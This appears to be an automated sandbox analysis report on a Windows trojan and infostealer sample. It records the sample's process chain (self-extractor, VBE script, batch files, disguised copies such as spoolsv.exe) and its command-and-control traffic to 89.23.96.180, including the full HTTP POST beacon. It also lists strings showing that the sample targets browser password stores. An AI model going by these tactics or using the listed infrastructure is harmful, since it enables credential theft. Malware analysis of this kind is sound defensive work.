                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.96.180
                                    Source: unknownHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.96.180
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlon
                                    Source: Providerbroker.exe, 00000005.00000002.2199739543.000000000331A000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014623000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000013574000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000145C6000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000135FC000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014190000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.00000000133CE000.00000004.00000800.00020000.00000000.sdmp, BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3338545208.0000000014230000.00000004.00000800.00020000.00000000.sdmp, 3pBYusr5No.12.dr, sDodk2mp2D.12.dr, FbmuqE5H99.12.dr, 3qsyKDP8IQ.12.dr, Dmtgf75u07.12.dr, cPqdm3tXvj.12.dr, CyqPZh4rXX.12.dr, X8lWEBvwqV.12.dr, jpoBZk5yMS.12.dr, XqiNtduMAb.12.dr, hbWw6mYJ9m.12.dr, XU2NzwwmuV.12.dr, T1E9twUbBG.12.dr, 9XC4s7Bayi.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_01006FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_01006FAA
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Windows\PrintDialog\pris\spoolsv.exeJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Windows\PrintDialog\pris\f3b6ecef712a24Jump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100848E0_2_0100848E
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010171530_2_01017153
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010251C90_2_010251C9
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010140880_2_01014088
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010100B70_2_010100B7
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010040FE0_2_010040FE
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010143BF0_2_010143BF
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010162CA0_2_010162CA
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010032F70_2_010032F7
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100C4260_2_0100C426
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0102D4400_2_0102D440
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100F4610_2_0100F461
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010177EF0_2_010177EF
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100E9B70_2_0100E9B7
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_010319F40_2_010319F4
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100286B0_2_0100286B
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0102D8EE0_2_0102D8EE
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_01016CDC0_2_01016CDC
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_01024F9A0_2_01024F9A
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0100EFE20_2_0100EFE2
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_01013E0B0_2_01013E0B
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF848E90D685_2_00007FF848E90D68
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF849042A805_2_00007FF849042A80
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF849044AD05_2_00007FF849044AD0
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490301215_2_00007FF849030121
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490449785_2_00007FF849044978
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF849035E555_2_00007FF849035E55
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490456B85_2_00007FF8490456B8
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490434FC5_2_00007FF8490434FC
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF849044DF25_2_00007FF849044DF2
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF8490438185_2_00007FF849043818
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF849043EFA5_2_00007FF849043EFA
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeCode function: 5_2_00007FF849592B7A5_2_00007FF849592B7A
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF848F20D6812_2_00007FF848F20D68
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490D2A8012_2_00007FF8490D2A80
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490D4AD012_2_00007FF8490D4AD0
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490C012112_2_00007FF8490C0121
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490D497812_2_00007FF8490D4978
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490C5E5512_2_00007FF8490C5E55
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490D34FB12_2_00007FF8490D34FB
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490D4DF212_2_00007FF8490D4DF2
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490D381812_2_00007FF8490D3818
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8490D3EFA12_2_00007FF8490D3EFA
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8498620EE12_2_00007FF8498620EE
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeCode function: 12_2_00007FF8496291F212_2_00007FF8496291F2
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AtVzwBvZ.log 6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: String function: 0101EB78 appears 39 times
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: String function: 0101F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: String function: 0101EC50 appears 56 times
                                    Source: 9FwQYJSj4N.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 9FwQYJSj4N.exe
                                    Source: 9FwQYJSj4N.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/326@0/1
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_01006C74 GetLastError,FormatMessageW,0_2_01006C74
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCode function: 0_2_0101A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0101A6C2
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Program Files\Windows Photo Viewer\en-GB\BSlvAOjamepaXWJMhY.exeJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Users\user\Desktop\IZCgKuwL.logJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeMutant created: \Sessions\1\BaseNamedObjects\Local\886b964eacdf58df64ccd2e35a7cc93f02ef5b995bb1b61ec19d87c5f2d1fe93
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeFile created: C:\Users\user\AppData\Local\Temp\43XWJvtbUsJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCommand line argument: sfxname0_2_0101DF1E
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCommand line argument: sfxstime0_2_0101DF1E
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeCommand line argument: STARTDLG0_2_0101DF1E
                                    Source: 9FwQYJSj4N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 9FwQYJSj4N.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: D3UfLhBBJJ.12.dr, TndQPxMXQo.12.dr, r0qjgzPIkh.12.dr, x0yxQhURQn.12.dr, XeIbEvYWIQ.12.dr, iGtwZmweIi.12.dr, J6wWm83AcX.12.dr, WMVgrZzlI2.12.dr, A6qid9rKI0.12.dr, xpwmdiF9Xd.12.dr, mFwkz74ztw.12.dr, lDghQMNLEm.12.dr, sF5lPCsrSZ.12.dr, jfFWd9FPzs.12.dr, GjC3IcPkIm.12.dr, Vy9PixD8sc.12.dr, K3UVPTvz6l.12.dr, mS5gWY23qA.12.dr, mdDDzs62xj.12.dr, 3nX90DZTPW.12.dr, JwuABv9dm3.12.dr, xwt4fmTFUM.12.dr, 86j4JQ2o4Z.12.dr, 2g2rxNrFnw.12.dr, LIyiRunvqW.12.dr, zT3f06aISQ.12.dr, kwohGiMSf5.12.dr, zxyq1dsFGb.12.dr, 3G2wLqKb18.12.dr, XThNagBSlP.12.dr, ADrKBoDBrh.12.dr, Bg9Q2dJ3qB.12.dr, WxN1Z9Ezn6.12.dr, qjA8QD9Yvc.12.dr, Za0p8caj7c.12.dr, e727nJSxva.12.dr, VPD1eybCAW.12.dr, 3V4JMiLW3I.12.dr, qYT7wvvnKf.12.dr, NJjqqd0MbJ.12.dr, 0MQKc7KiGj.12.dr, KmyMndCGiO.12.dr, 1iRZHQm6nf.12.dr, Bcsa3YuZos.12.dr, 1OV5THlLD9.12.dr, Wg9yq9gc1h.12.dr, Qx1koE7tFM.12.dr, nXWAUw0iQ4.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: 9FwQYJSj4N.exeVirustotal: Detection: 59%
                                    Source: 9FwQYJSj4N.exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeFile read: C:\Users\user\Desktop\9FwQYJSj4N.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\9FwQYJSj4N.exe "C:\Users\user\Desktop\9FwQYJSj4N.exe"
                                    Source: C:\Users\user\Desktop\9FwQYJSj4N.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\providerBrowserruntimeCrt\RKDq4baPXf3oYQLQ9KOfosRSo5hZYYngNhYF.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\providerBrowserruntimeCrt\EOj1ahBHdasVqOTXmQoagNDGVj6XidHKqZ.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\providerBrowserruntimeCrt\Providerbroker.exe "C:\providerBrowserruntimeCrt/Providerbroker.exe"
                                    Source: C:\providerBrowserruntimeCrt\Providerbroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe"
